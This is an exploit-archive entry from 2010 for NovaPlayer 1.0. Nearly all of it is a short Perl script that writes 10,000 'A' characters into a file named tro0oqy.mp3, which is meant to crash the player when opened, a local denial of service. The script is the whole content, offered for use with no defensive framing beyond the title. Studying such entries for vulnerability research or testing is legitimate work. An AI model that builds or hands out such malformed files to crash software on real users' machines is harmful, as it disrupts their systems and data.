id: 10898
date: 02/14/2010
title: NovaPlayer 1.0 (.mp3) Local Denial of Service
author: Mr.tro0oqy
cves: 

=============================================
NovaPlayer 1.0 (.mp3) Local Denial of Service
=============================================

#!/usr/bin/perl
print qq (
######################################################
#NovaPlayer 1.0 (.mp3) Local Denial of Service (DoS) #
# by Mr.tro0oqy #
######################################################
);
#author: Mr.tro0oqy
system ("color e");
my $bb="tro0oqy.mp3";
my $fk="\x41" x 10000;
open (myfile,'>>tro0oqy.mp3');
print myfile $fk;
print "great\n "



#  0day.today [2023-03-24]  #